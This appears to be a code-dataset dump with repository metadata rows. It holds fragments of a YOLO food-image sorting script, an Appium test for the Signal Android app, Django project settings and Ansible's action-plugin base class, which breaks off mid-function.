img_root = "F:/serve_data/OVEN/nofood148" # 图片文件地址
layer_data_root = "F:/serve_data/OVEN/nofood148_layer_data"
if not os.path.exists(layer_data_root): os.mkdir(layer_data_root)
save_root = "F:/serve_data/OVEN/nofood148_detection"
if not os.path.exists(save_root): os.mkdir(save_root)
Y = YoloPredict()
end_time0 = time.time()
print("model loading time:", end_time0 - start_time)
# cls = ["beefsteak", "cartooncookies", "chickenwings", "chiffoncake6", "chiffoncake8",
# "cookies", "cranberrycookies", "cupcake", "eggtart", "peanuts",
# "pizzacut", "pizzaone", "pizzatwo", "porkchops", "potatocut", "potatol",
# "potatos", "sweetpotatocut", "sweetpotatol", "sweetpotatos",
# "roastedchicken", "toast", "chestnut", "cornone", "corntwo", "drumsticks", "taro",
# "steamedbread", "eggplant", "eggplant_cut_sauce", "bread", "container_nonhigh",
# "container", "fish", "hotdog", "redshrimp",
# "shrimp", "strand"]
# cls = ["cornone", "eggplant", "fish", "nofood", "potatol", "roastedchicken", "shrimp", "toast"]
# cls = ["container", "fish", "nofood", "roastedchicken", "shrimp", "toast"]
# cls = os.listdir(img_root)
classes_id39 = {"cartooncookies": 1, "cookies": 5, "cupcake": 7, "beefsteak": 0, "chickenwings": 2,
"chiffoncake6": 3, "chiffoncake8": 4, "cranberrycookies": 6, "eggtart": 8,
"nofood": 9, "peanuts": 10, "porkchops": 14, "potatocut": 15, "potatol": 16,
"potatos": 17, "sweetpotatocut": 18, "sweetpotatol": 19,
"pizzacut": 11, "pizzaone": 12, "roastedchicken": 21,
"pizzatwo": 13, "sweetpotatos": 20, "toast": 22, "chestnut": 23, "cornone": 24, "corntwo": 25,
"drumsticks": 26,
"taro": 27, "steamedbread": 28, "eggplant": 29, "eggplant_cut_sauce": 30, "bread": 31,
"container_nonhigh": 32,
"container": 33, "duck": 21, "fish": 34, "hotdog": 35, "redshrimp": 36,
"shrimp": 37, "strand": 38, "xizhi": 39, "chiffon_4": 101, "potatom": 40, "sweetpotatom": 41}
cls=[""]
new_classes = {v: k for k, v in classes_id39.items()}
layer_id = {0: "bottom", 1: "middle", 2: "top", 3: "others"}
for c in cls:
img_dir = img_root + "/" + c
save_dir = save_root + "/" + c
layer_data_dir=layer_data_root+"/"+c
if not os.path.exists(layer_data_dir): os.mkdir(layer_data_dir)
for img in tqdm(os.listdir(img_dir)):
if img.endswith("jpg"):
img_path = img_dir + "/" + img
end_time1 = time.time()
bboxes_p, layer_, best_bboxes = Y.result(img_path, save_dir)
bboxes_pr, layer_n, best_bboxes = correct_bboxes(bboxes_p, layer_, best_bboxes) # 矫正输出结果
bboxes_pr, layer_n = get_potatoml(bboxes_pr, layer_n) # 根据输出结果对中大红薯,中大土豆做输出
print(bboxes_pr)
print(layer_n)
# 烤层分到对应文件夹
if not os.path.exists(layer_data_dir + "/" + layer_id[layer_n]): os.mkdir(
layer_data_dir + "/" + layer_id[layer_n])
shutil.copy(img_path, layer_data_dir + "/" + layer_id[layer_n] + "/"+img)
# 食材分到对应文件夹
if len(bboxes_pr) == 0:
if not os.path.exists(img_dir + "/noresult"): os.mkdir(img_dir + "/noresult")
shutil.move(img_path, img_dir + "/noresult" + "/" + img)
else:
pre = int(bboxes_pr[0][-1])
if not os.path.exists(img_dir + "/" + new_classes[pre]): os.mkdir(img_dir + "/" + new_classes[pre])
shutil.move(img_path, img_dir + "/" + new_classes[pre] + "/" + img)
end_time1 = time.time()
print("all data time:", end_time1 - end_time0)
| [
"[email protected]"
] | |
1e290eaf806b12b3d70a04f888edc40c280cb978 | dc871754a421c85177dc00134e227845822154e5 | /Python/EmpireXpOOP2o/Oyun.py | 18526e2a88e5c73b3f009183a49333e01f692477 | [] | no_license | ibrahimylmz3/MedipolCodes | 5af3826dff44be9ce658cf61d637e2c1a4babaf6 | 839afdd74568329184e579805c112773c7b83bc8 | refs/heads/master | 2020-11-27T04:37:25.812720 | 2019-12-20T15:51:52 | 2019-12-20T15:51:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 121 | py | import Dunya
game = Dunya.dunya()
game.oyuncuSayisi = 6
game.oyuncuEkle()
game.ulkleriOlustur()
game.komsulariBelirle()
| [
"[email protected]"
] | |
bb711b9545190d0bb301ef3888269d53576f13a7 | 8d9318a33afc2c3b5ca8ac99fce0d8544478c94a | /Books/Casandra DB/opscenter-5.1.0/lib/py-win32/2.7/twisted/internet/address.py | aea84bf68bbed91d502c7072beb96a2ac2766dff | [] | no_license | tushar239/git-large-repo | e30aa7b1894454bf00546312a3fb595f6dad0ed6 | 9ee51112596e5fc3a7ab2ea97a86ec6adc677162 | refs/heads/master | 2021-01-12T13:48:43.280111 | 2016-11-01T22:14:51 | 2016-11-01T22:14:51 | 69,609,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:a515bfec9ac845d6ff70998513414bc502c31a8567def729df1252d0faeb057b
size 4196
| [
"[email protected]"
] | |
69ee5e0cc7739ebcbee9d1a3e5819b28dde34833 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/signal/testcase/firstcases/testcase1_016.py | e81237d6fa82e693c08ba184b53c1b1c193da30e | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,616 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'org.thoughtcrime.securesms',
'appActivity' : 'org.thoughtcrime.securesms.ConversationListActivity',
'resetKeyboard' : True,
'androidCoverage' : 'org.thoughtcrime.securesms/org.thoughtcrime.securesms.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
p = subprocess.Popen(cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
time.sleep(timeout)
p.terminate()
return
def getElememt(driver, str) :
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str)
return element
def getElememtBack(driver, str1, str2) :
for i in range(0, 2, 1):
try:
element = driver.find_element_by_android_uiautomator(str1)
except NoSuchElementException:
time.sleep(1)
else:
return element
for i in range(0, 5, 1):
try:
element = driver.find_element_by_android_uiautomator(str2)
except NoSuchElementException:
time.sleep(1)
else:
return element
os.popen("adb shell input tap 50 50")
element = driver.find_element_by_android_uiautomator(str2)
return element
def swipe(driver, startxper, startyper, endxper, endyper) :
size = driver.get_window_size()
width = size["width"]
height = size["height"]
try:
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
except WebDriverException:
time.sleep(1)
driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
end_y=int(height * endyper), duration=2000)
return
# testcase016
try :
starttime = time.time()
driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
element = getElememt(driver, "new UiSelector().resourceId(\"org.thoughtcrime.securesms:id/sms_failed_indicator\").className(\"android.widget.ImageView\")")
TouchAction(driver).long_press(element).release().perform()
element = getElememt(driver, "new UiSelector().resourceId(\"org.thoughtcrime.securesms:id/sms_failed_indicator\").className(\"android.widget.ImageView\")")
TouchAction(driver).tap(element).perform()
element = getElememtBack(driver, "new UiSelector().text(\"133\")", "new UiSelector().className(\"android.widget.TextView\").instance(3)")
TouchAction(driver).long_press(element).release().perform()
element = getElememtBack(driver, "new UiSelector().text(\"Your version of Signal has expired!\")", "new UiSelector().className(\"android.widget.TextView\").instance(1)")
TouchAction(driver).tap(element).perform()
except Exception, e:
print 'FAIL'
print 'str(e):\t\t', str(e)
print 'repr(e):\t', repr(e)
print traceback.format_exc()
else:
print 'OK'
finally:
cpackage = driver.current_package
endtime = time.time()
print 'consumed time:', str(endtime - starttime), 's'
command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"1_016\"")
jacocotime = time.time()
print 'jacoco time:', str(jacocotime - endtime), 's'
driver.quit()
if (cpackage != 'org.thoughtcrime.securesms'):
cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"[email protected]"
] | |
d38fe136135727031be58d9f7ae57117d9659ff6 | 0d45e05e1eda670b233081118bbcb63743c166db | /web/act_assist/settings.py | 98cdcc4d0b82667a1b1f93b5264afd75a34cc1cd | [
"MIT"
] | permissive | maleriepace/activity-assistant | 24ef7e4e6488e31726ba21c07acda83a7119f979 | c5baa21f3d22db18da591ddf76e7bf6a7e7229cc | refs/heads/master | 2023-01-31T15:53:30.100115 | 2020-12-13T14:41:04 | 2020-12-13T14:41:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,996 | py | """
Django settings for hassbrain_web project.
Generated by 'django-admin startproject' using Django 2.1.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
import logging
logger = logging.getLogger(__name__)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
#ALLOWED_HOSTS = ['0.0.0.0', 'localhost']
# allow hosts for the home net
#ALLOWED_HOSTS += ['192.168.178.{}'.format(j) for j in range(256)]
ALLOWED_HOSTS = ['*'] # TODO debug measure
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles', 'rest_framework', 'qr_code',
'rest_framework.authtoken',
'frontend.apps.FrontendConfig',
'backend.apps.BackendConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'act_assist.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'act_assist.wsgi.application'
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
# every use is corrected by using own methods e.g current_time in frontend.util
TIME_ZONE = 'UTC'
USE_TZ = False
USE_I18N = True
USE_L10N = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
SERVE_MEDIA = True
MEDIA_URL = '/media/'
HASS_API_URL = 'http://supervisor/core/api'
DATA_ROOT = '/data/'
MEDIA_ROOT = DATA_ROOT + 'media/'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': DATA_ROOT + 'db.sqlite3',
}
}
# experiment
POLL_INTERVAL_LST = ['5s', '1m', '10m', '30m', '2h', '6h']
DATASET_PATH = DATA_ROOT + 'datasets/' # path where all the datasets lie
ACTIVITY_FILE_NAME="activities_subject_%s.csv"
ACTIVITY_MAPPING_FILE_NAME="activity_mapping.csv"
DATA_FILE_NAME='devices.csv'
DATA_MAPPING_FILE_NAME='device_mapping.csv'
PRIOR_ACTIVITY_FILE_NAME = "prior_activities_subject_%s.csv"
DEV_ROOM_ASSIGNMENT_FILE_NAME = "devices_and_areas.csv"
ACT_ROOM_ASSIGNMENT_FILE_NAME = "activities_and_areas.csv"
DB_URL = 'sqlite:////config/home-assistant_v2.db'
ACT_ASSIST_VERSION = "v0.0.1-alpha"
ACT_ASSIST_RELEASE_LINK = "https://github.com/tcsvn/activity-assistant-logger/releases/download/{}/activity-assistant.apk".format(ACT_ASSIST_VERSION)
# API URLS
URL_SERVER = r'server'
URL_DEVICE_PREDICTIONS = r'devicepredictions'
URL_ACTIVITY_PREDICTIONS = r'activitypredictions'
URL_PERSONS = r'/person/'
URL_SYNTHETIC_ACTIVITY = r'syntheticactivity'
URL_DEVICE_COMPONENT = r'devcomp'
# qrcode cache
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'qr-code': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'qr-code-cache',
'TIMEOUT': 3600
}
}
QR_CODE_CACHE_ALIAS = 'qr-code'
from os import environ
ENV_SETTINGS = environ.get('DJANGO_ENV') or 'development'
if ENV_SETTINGS == 'development':
try:
from act_assist.local_settings.development import *
except ImportError:
logger.error('couldn\'t import development settings')
raise
elif ENV_SETTINGS == 'production':
try:
from act_assist.local_settings.production import *
except ImportError:
logger.error('couldn\'t import development settings')
raise
| [
"[email protected]"
] | |
3e28462872d134c1fbcd211fc3c8b0fff0004cc3 | c50c7111279fc9cfb75f414bf72b7faeb3aa93bc | /raise.py | 7161dd53a065fee7228038e606e670a75e67b1e7 | [] | no_license | Hemanthtm2/Python | d95cbd89778074dc87d75e86c75f998b6e419c93 | 64a21c9a6dadf2bb92616fbdc4209119afcaa562 | refs/heads/master | 2021-08-24T07:24:20.509134 | 2017-11-07T18:35:44 | 2017-11-07T18:35:44 | 108,621,725 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 153 | py | #!/usr/bin/pyrhon
def inputnumber():
x=input('Pick a number')
if x==17:
raise ValueError,'17 is a bad number'
return x
print inputnumber()
| [
"[email protected]"
] | |
37af8208dcb36c4044221093bb7d68406fb2b9e3 | 9cd8f44aad83309c2a5dd6886bb4cab82453ad4f | /usr/lib/python2.7/dist-packages/ansible/plugins/action/__init__.py | 8f0c1055725ae44ac60ee0f524e1027040857a3f | [
"Python-2.0"
] | permissive | kojitaniguchi/isucon-summer | 4608c1a93d728432ff948340b888c9eb2aa8a34b | e790277ecbdda638bd0d212460a15b601c0d47dc | refs/heads/master | 2022-10-30T00:14:59.442906 | 2017-08-25T09:01:16 | 2017-08-25T09:01:16 | 101,384,555 | 1 | 1 | null | 2022-10-28T10:54:17 | 2017-08-25T08:41:55 | null | UTF-8 | Python | false | false | 27,151 | py | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import base64
import json
import os
import pipes
import random
import stat
import tempfile
import time
from abc import ABCMeta, abstractmethod
from ansible.compat.six import binary_type, text_type, iteritems, with_metaclass
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleConnectionFailure
from ansible.executor.module_common import modify_module
from ansible.parsing.utils.jsonify import jsonify
from ansible.utils.unicode import to_bytes, to_unicode
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
class ActionBase(with_metaclass(ABCMeta, object)):
'''
This class is the base class for all action plugins, and defines
code common to all actions. The base class handles the connection
by putting/getting files and executing commands based on the current
action in use.
'''
def __init__(self, task, connection, play_context, loader, templar, shared_loader_obj):
self._task = task
self._connection = connection
self._play_context = play_context
self._loader = loader
self._templar = templar
self._shared_loader_obj = shared_loader_obj
# Backwards compat: self._display isn't really needed, just import the global display and use that.
self._display = display
self._supports_check_mode = True
@abstractmethod
def run(self, tmp=None, task_vars=None):
""" Action Plugins should implement this method to perform their
tasks. Everything else in this base class is a helper method for the
action plugin to do that.
:kwarg tmp: Temporary directory. Sometimes an action plugin sets up
a temporary directory and then calls another module. This parameter
allows us to reuse the same directory for both.
:kwarg task_vars: The variables (host vars, group vars, config vars,
etc) associated with this task.
:returns: dictionary of results from the module
Implementors of action modules may find the following variables especially useful:
* Module parameters. These are stored in self._task.args
"""
# store the module invocation details into the results
results = {}
if self._task.async == 0:
results['invocation'] = dict(
module_name = self._task.action,
module_args = self._task.args,
)
return results
def _configure_module(self, module_name, module_args, task_vars=None):
'''
Handles the loading and templating of the module code through the
modify_module() function.
'''
if task_vars is None:
task_vars = dict()
# Search module path(s) for named module.
for mod_type in self._connection.module_implementation_preferences:
# Check to determine if PowerShell modules are supported, and apply
# some fixes (hacks) to module name + args.
if mod_type == '.ps1':
# win_stat, win_file, and win_copy are not just like their
# python counterparts but they are compatible enough for our
# internal usage
if module_name in ('stat', 'file', 'copy') and self._task.action != module_name:
module_name = 'win_%s' % module_name
# Remove extra quotes surrounding path parameters before sending to module.
if module_name in ('win_stat', 'win_file', 'win_copy', 'slurp') and module_args and hasattr(self._connection._shell, '_unquote'):
for key in ('src', 'dest', 'path'):
if key in module_args:
module_args[key] = self._connection._shell._unquote(module_args[key])
module_path = self._shared_loader_obj.module_loader.find_plugin(module_name, mod_type)
if module_path:
break
else:
# Use Windows version of ping module to check module paths when
# using a connection that supports .ps1 suffixes. We check specifically
# for win_ping here, otherwise the code would look for ping.ps1
if '.ps1' in self._connection.module_implementation_preferences:
ping_module = 'win_ping'
else:
ping_module = 'ping'
module_path2 = self._shared_loader_obj.module_loader.find_plugin(ping_module, self._connection.module_implementation_preferences)
if module_path2 is not None:
raise AnsibleError("The module %s was not found in configured module paths" % (module_name))
else:
raise AnsibleError("The module %s was not found in configured module paths. "
"Additionally, core modules are missing. If this is a checkout, "
"run 'git submodule update --init --recursive' to correct this problem." % (module_name))
# insert shared code and arguments into the module
(module_data, module_style, module_shebang) = modify_module(module_path, module_args, task_vars=task_vars)
return (module_style, module_shebang, module_data)
def _compute_environment_string(self):
'''
Builds the environment string to be used when executing the remote task.
'''
final_environment = dict()
if self._task.environment is not None:
environments = self._task.environment
if not isinstance(environments, list):
environments = [ environments ]
# the environments as inherited need to be reversed, to make
# sure we merge in the parent's values first so those in the
# block then task 'win' in precedence
environments.reverse()
for environment in environments:
if environment is None:
continue
temp_environment = self._templar.template(environment)
if not isinstance(temp_environment, dict):
raise AnsibleError("environment must be a dictionary, received %s (%s)" % (temp_environment, type(temp_environment)))
# very deliberately using update here instead of combine_vars, as
# these environment settings should not need to merge sub-dicts
final_environment.update(temp_environment)
final_environment = self._templar.template(final_environment)
return self._connection._shell.env_prefix(**final_environment)
def _early_needs_tmp_path(self):
'''
Determines if a temp path should be created before the action is executed.
'''
return getattr(self, 'TRANSFERS_FILES', False)
def _late_needs_tmp_path(self, tmp, module_style):
'''
Determines if a temp path is required after some early actions have already taken place.
'''
if tmp and "tmp" in tmp:
# tmp has already been created
return False
if not self._connection.has_pipelining or not self._play_context.pipelining or C.DEFAULT_KEEP_REMOTE_FILES or self._play_context.become_method == 'su':
# tmp is necessary to store the module source code
# or we want to keep the files on the target system
return True
if module_style != "new":
# even when conn has pipelining, old style modules need tmp to store arguments
return True
return False
def _make_tmp_path(self):
'''
Create and return a temporary path on a remote box.
'''
basefile = 'ansible-tmp-%s-%s' % (time.time(), random.randint(0, 2**48))
use_system_tmp = False
if self._play_context.become and self._play_context.become_user != 'root':
use_system_tmp = True
tmp_mode = None
if self._play_context.remote_user != 'root' or self._play_context.become and self._play_context.become_user != 'root':
tmp_mode = 0o755
cmd = self._connection._shell.mkdtemp(basefile, use_system_tmp, tmp_mode)
result = self._low_level_execute_command(cmd, sudoable=False)
# error handling on this seems a little aggressive?
if result['rc'] != 0:
if result['rc'] == 5:
output = 'Authentication failure.'
elif result['rc'] == 255 and self._connection.transport in ('ssh',):
if self._play_context.verbosity > 3:
output = u'SSH encountered an unknown error. The output was:\n%s%s' % (result['stdout'], result['stderr'])
else:
output = (u'SSH encountered an unknown error during the connection.'
' We recommend you re-run the command using -vvvv, which will enable SSH debugging output to help diagnose the issue')
elif u'No space left on device' in result['stderr']:
output = result['stderr']
else:
output = ('Authentication or permission failure.'
' In some cases, you may have been able to authenticate and did not have permissions on the remote directory.'
' Consider changing the remote temp path in ansible.cfg to a path rooted in "/tmp".'
' Failed command was: %s, exited with result %d' % (cmd, result['rc']))
if 'stdout' in result and result['stdout'] != u'':
output = output + u": %s" % result['stdout']
raise AnsibleConnectionFailure(output)
try:
rc = self._connection._shell.join_path(result['stdout'].strip(), u'').splitlines()[-1]
except IndexError:
# stdout was empty or just space, set to / to trigger error in next if
rc = '/'
# Catch failure conditions, files should never be
# written to locations in /.
if rc == '/':
raise AnsibleError('failed to resolve remote temporary directory from %s: `%s` returned empty string' % (basefile, cmd))
return rc
def _remove_tmp_path(self, tmp_path):
'''Remove a temporary path we created. '''
if tmp_path and "-tmp-" in tmp_path:
cmd = self._connection._shell.remove(tmp_path, recurse=True)
# If we have gotten here we have a working ssh configuration.
# If ssh breaks we could leave tmp directories out on the remote system.
self._low_level_execute_command(cmd, sudoable=False)
def _transfer_data(self, remote_path, data):
'''
Copies the module data out to the temporary module path.
'''
if isinstance(data, dict):
data = jsonify(data)
afd, afile = tempfile.mkstemp()
afo = os.fdopen(afd, 'w')
try:
data = to_bytes(data, errors='strict')
afo.write(data)
except Exception as e:
#raise AnsibleError("failure encoding into utf-8: %s" % str(e))
raise AnsibleError("failure writing module data to temporary file for transfer: %s" % str(e))
afo.flush()
afo.close()
try:
self._connection.put_file(afile, remote_path)
finally:
os.unlink(afile)
return remote_path
def _remote_chmod(self, mode, path, sudoable=False):
'''
Issue a remote chmod command
'''
cmd = self._connection._shell.chmod(mode, path)
res = self._low_level_execute_command(cmd, sudoable=sudoable)
return res
def _remote_checksum(self, path, all_vars):
'''
Takes a remote checksum and returns 1 if no file
'''
python_interp = all_vars.get('ansible_python_interpreter', 'python')
cmd = self._connection._shell.checksum(path, python_interp)
data = self._low_level_execute_command(cmd, sudoable=True)
try:
data2 = data['stdout'].strip().splitlines()[-1]
if data2 == u'':
# this may happen if the connection to the remote server
# failed, so just return "INVALIDCHECKSUM" to avoid errors
return "INVALIDCHECKSUM"
else:
return data2.split()[0]
except IndexError:
display.warning(u"Calculating checksum failed unusually, please report this to "
u"the list so it can be fixed\ncommand: %s\n----\noutput: %s\n----\n" % (to_unicode(cmd), data))
# this will signal that it changed and allow things to keep going
return "INVALIDCHECKSUM"
def _remote_expand_user(self, path):
''' takes a remote path and performs tilde expansion on the remote host '''
if not path.startswith('~'): # FIXME: Windows paths may start with "~ instead of just ~
return path
# FIXME: Can't use os.path.sep for Windows paths.
split_path = path.split(os.path.sep, 1)
expand_path = split_path[0]
if expand_path == '~':
if self._play_context.become and self._play_context.become_user:
expand_path = '~%s' % self._play_context.become_user
cmd = self._connection._shell.expand_user(expand_path)
data = self._low_level_execute_command(cmd, sudoable=False)
#initial_fragment = utils.last_non_blank_line(data['stdout'])
initial_fragment = data['stdout'].strip().splitlines()[-1]
if not initial_fragment:
# Something went wrong trying to expand the path remotely. Return
# the original string
return path
if len(split_path) > 1:
return self._connection._shell.join_path(initial_fragment, *split_path[1:])
else:
return initial_fragment
def _filter_leading_non_json_lines(self, data):
'''
Used to avoid random output from SSH at the top of JSON output, like messages from
tcagetattr, or where dropbear spews MOTD on every single command (which is nuts).
need to filter anything which starts not with '{', '[', ', '=' or is an empty line.
filter only leading lines since multiline JSON is valid.
'''
idx = 0
for line in data.splitlines(True):
if line.startswith((u'{', u'[')):
break
idx = idx + len(line)
return data[idx:]
def _execute_module(self, module_name=None, module_args=None, tmp=None, task_vars=None, persist_files=False, delete_remote_tmp=True):
'''
Transfer and run a module along with its arguments.
'''
if task_vars is None:
task_vars = dict()
# if a module name was not specified for this execution, use
# the action from the task
if module_name is None:
module_name = self._task.action
if module_args is None:
module_args = self._task.args
# set check mode in the module arguments, if required
if self._play_context.check_mode and not self._task.always_run:
if not self._supports_check_mode:
raise AnsibleError("check mode is not supported for this operation")
module_args['_ansible_check_mode'] = True
# set no log in the module arguments, if required
if self._play_context.no_log or C.DEFAULT_NO_TARGET_SYSLOG:
module_args['_ansible_no_log'] = True
# set debug in the module arguments, if required
if C.DEFAULT_DEBUG:
module_args['_ansible_debug'] = True
(module_style, shebang, module_data) = self._configure_module(module_name=module_name, module_args=module_args, task_vars=task_vars)
if not shebang:
raise AnsibleError("module is missing interpreter line")
# a remote tmp path may be necessary and not already created
remote_module_path = None
args_file_path = None
if not tmp and self._late_needs_tmp_path(tmp, module_style):
tmp = self._make_tmp_path()
if tmp:
remote_module_filename = self._connection._shell.get_remote_filename(module_name)
remote_module_path = self._connection._shell.join_path(tmp, remote_module_filename)
if module_style in ['old', 'non_native_want_json']:
# we'll also need a temp file to hold our module arguments
args_file_path = self._connection._shell.join_path(tmp, 'args')
if remote_module_path or module_style != 'new':
display.debug("transferring module to remote")
self._transfer_data(remote_module_path, module_data)
if module_style == 'old':
# we need to dump the module args to a k=v string in a file on
# the remote system, which can be read and parsed by the module
args_data = ""
for k,v in iteritems(module_args):
args_data += '%s="%s" ' % (k, pipes.quote(text_type(v)))
self._transfer_data(args_file_path, args_data)
elif module_style == 'non_native_want_json':
self._transfer_data(args_file_path, json.dumps(module_args))
display.debug("done transferring module to remote")
environment_string = self._compute_environment_string()
if tmp and "tmp" in tmp and self._play_context.become and self._play_context.become_user != 'root':
# deal with possible umask issues once sudo'ed to other user
self._remote_chmod('a+r', remote_module_path)
cmd = ""
in_data = None
if self._connection.has_pipelining and self._play_context.pipelining and not C.DEFAULT_KEEP_REMOTE_FILES:
in_data = module_data
else:
if remote_module_path:
cmd = remote_module_path
rm_tmp = None
if tmp and "tmp" in tmp and not C.DEFAULT_KEEP_REMOTE_FILES and not persist_files and delete_remote_tmp:
if not self._play_context.become or self._play_context.become_user == 'root':
# not sudoing or sudoing to root, so can cleanup files in the same step
rm_tmp = tmp
cmd = self._connection._shell.build_module_command(environment_string, shebang, cmd, arg_path=args_file_path, rm_tmp=rm_tmp)
cmd = cmd.strip()
sudoable = True
if module_name == "accelerate":
# always run the accelerate module as the user
# specified in the play, not the sudo_user
sudoable = False
res = self._low_level_execute_command(cmd, sudoable=sudoable, in_data=in_data)
if tmp and "tmp" in tmp and not C.DEFAULT_KEEP_REMOTE_FILES and not persist_files and delete_remote_tmp:
if self._play_context.become and self._play_context.become_user != 'root':
# not sudoing to root, so maybe can't delete files as that other user
# have to clean up temp files as original user in a second step
cmd2 = self._connection._shell.remove(tmp, recurse=True)
self._low_level_execute_command(cmd2, sudoable=False)
try:
data = json.loads(self._filter_leading_non_json_lines(res.get('stdout', u'')))
except ValueError:
# not valid json, lets try to capture error
data = dict(failed=True, parsed=False)
if 'stderr' in res and res['stderr'].startswith(u'Traceback'):
data['exception'] = res['stderr']
else:
data['msg'] = "MODULE FAILURE"
data['module_stdout'] = res.get('stdout', u'')
if 'stderr' in res:
data['module_stderr'] = res['stderr']
# pre-split stdout into lines, if stdout is in the data and there
# isn't already a stdout_lines value there
if 'stdout' in data and 'stdout_lines' not in data:
data['stdout_lines'] = data.get('stdout', u'').splitlines()
display.debug("done with _execute_module (%s, %s)" % (module_name, module_args))
return data
def _low_level_execute_command(self, cmd, sudoable=True, in_data=None,
executable=None, encoding_errors='replace'):
'''
This is the function which executes the low level shell command, which
may be commands to create/remove directories for temporary files, or to
run the module code or python directly when pipelining.
:kwarg encoding_errors: If the value returned by the command isn't
utf-8 then we have to figure out how to transform it to unicode.
If the value is just going to be displayed to the user (or
discarded) then the default of 'replace' is fine. If the data is
used as a key or is going to be written back out to a file
verbatim, then this won't work. May have to use some sort of
replacement strategy (python3 could use surrogateescape)
'''
if executable is not None:
cmd = executable + ' -c ' + cmd
display.debug("_low_level_execute_command(): starting")
if not cmd:
# this can happen with powershell modules when there is no analog to a Windows command (like chmod)
display.debug("_low_level_execute_command(): no command, exiting")
return dict(stdout='', stderr='')
allow_same_user = C.BECOME_ALLOW_SAME_USER
same_user = self._play_context.become_user == self._play_context.remote_user
if sudoable and self._play_context.become and (allow_same_user or not same_user):
display.debug("_low_level_execute_command(): using become for this command")
cmd = self._play_context.make_become_cmd(cmd, executable=executable)
display.debug("_low_level_execute_command(): executing: %s" % (cmd,))
rc, stdout, stderr = self._connection.exec_command(cmd, in_data=in_data, sudoable=sudoable)
# stdout and stderr may be either a file-like or a bytes object.
# Convert either one to a text type
if isinstance(stdout, binary_type):
out = to_unicode(stdout, errors=encoding_errors)
elif not isinstance(stdout, text_type):
out = to_unicode(b''.join(stdout.readlines()), errors=encoding_errors)
else:
out = stdout
if isinstance(stderr, binary_type):
err = to_unicode(stderr, errors=encoding_errors)
elif not isinstance(stderr, text_type):
err = to_unicode(b''.join(stderr.readlines()), errors=encoding_errors)
else:
err = stderr
if rc is None:
rc = 0
